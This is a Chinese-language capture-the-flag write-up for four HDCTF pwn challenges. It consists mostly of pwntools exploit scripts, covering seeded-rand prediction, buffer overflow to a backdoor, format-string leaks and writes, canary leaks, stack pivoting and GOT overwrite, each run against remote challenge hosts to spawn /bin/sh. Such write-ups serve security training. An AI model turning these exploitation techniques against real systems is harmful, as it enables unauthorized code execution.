pwnner
有后门函数,seed是一个固定值,
//伪随机数
#include <stdio.h>
#include <stdlib.h>
int main()
{
int b;
srand(0x39);
for (size_t i = 0; i <1; i++)
{
b = rand() ;
printf("%d ", b); #1956681178
}
return 0;
}
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn',28067)
p.sendafter("name:\n",'1956681178')
payload = 'a'*0x48 +p64(0x4008B3)
p.sendlineafter("next?\n",payload)
p.interactive()
KEEP ON
附件 普通的栈迁移,用格式字符串漏洞泄露old_rbp ,
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p=remote('node4.anna.nssctf.cn',28609)
p.sendafter(": \n",'%16$p')
p.recvuntil('0x')
rbp = int(p.recv(12),16)
print(hex(rbp))
payload ="aaaaaaaa" +p64(0x4008d3)+p64(rbp-0x60+0x20)+p64(0x4005e0)+'/bin/sh\x00'
payload = payload.ljust(0x50,'a') +p64(rbp-0x10-0x50)+p64(0x4007f2)
p.recvuntil("keep on !\n")
p.send(payload)
p.interactive()
Makewish
附件 没有种子函数,默认为0,用gdb调试或用第一题的伪随机数脚本可以得到随机数,
用puts泄露canary,off by null 漏洞,覆盖rbp最后一字节为\x00,实现栈迁移
即使exp是真确的,也不能保证百分百一次性打通,
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node4.anna.nssctf.cn',28727)
system = 0x4007Cb
ret = 0x4005d9
p.sendafter("name\n\n",b'a'*0x29)
p.recvuntil('a'*0x29)
canary = u64(p.recv(7).rjust(8,'\x00'))
print(hex(canary))
p.sendafter("key\n\n",p32(0x000002c3)) #由于read只能读四个字节,不能用sendline,
payload = p64(ret)*10 +p64(system)+p64(canary)
p.sendafter("welcome to HDctf,You can make a wish to me\n",payload)
p.interactive()
Minions
附件 计算偏移,用%d$n (d:表示十进制数) 往key写数据,或者用fmtstr_payload{偏移,{key:数据}}
这道题用栈迁移迁到0x6010C0,是不可行的,因为0x6010C0离非rw段太近了
0x600000 0x601000 r--p 1000 #非rw段
0x601000 0x602000 rw-p 1000
我将介绍两种方法解决这道题目
方法一
栈循环一次,栈迁移到更高的地方
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn',28190)
#p = process('./4')
elf = ELF('./4')
def d():
gdb.attach(p)
pause()
bss = elf.bss(0xe00)
rdi = 0x400893
leave_ret = 0x400758
key = 0x6010A0
again = 0x4007DE
system = 0x4005c0
binsh = 0x6010C8
payload = '%102c%8$n'+'a'*7 +p64(key)
p.sendlineafter("Welcome to HDCTF.What you name?\n\n",payload)
payload = 'a'*0x30 +p64(bss+0x30)+p64(again)
p.sendafter("welcome,tell me more about you\n",payload)
p.sendlineafter("That's great.Do you like Minions?\n",'/bin/sh\x00')
payload = p64(rdi)+p64(binsh)+p64(system)
payload = payload.ljust(0x30,'\x00')+p64(bss-8)+p64(leave_ret)
p.sendafter("welcome,tell me more about you\n",payload)
p.sendlineafter("That's great.Do you like Minions?\n",'/bin/sh\x00'*5)
p.interactive()
方法二
栈循环两次,将printf_got修改为system
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn',28627)
elf = ELF('./4')
key = 0x6010A0
main =0x4007Ae
system = 0x4005c0
payload = '%102c%8$n'+'a'*7 +p64(key)
p.sendlineafter("Welcome to HDCTF.What you name?\n\n",payload)
payload2 = 'a'*0x38+p64(main)
p.sendafter("welcome,tell me more about you\n",payload2)
p.sendafter("That's great.Do you like Minions?\n",'/bin/sh\x00')
payload = fmtstr_payload(6,{elf.got['printf']:system})
p.sendafter("Welcome to HDCTF.What you name?\n\n",payload)
p.sendafter("welcome,tell me more about you\n",payload2)
p.sendafter("That's great.Do you like Minions?\n",'/bin/sh\x00')
p.sendafter("Welcome to HDCTF.What you name?\n\n",'/bin/sh\x00')
p.interactive()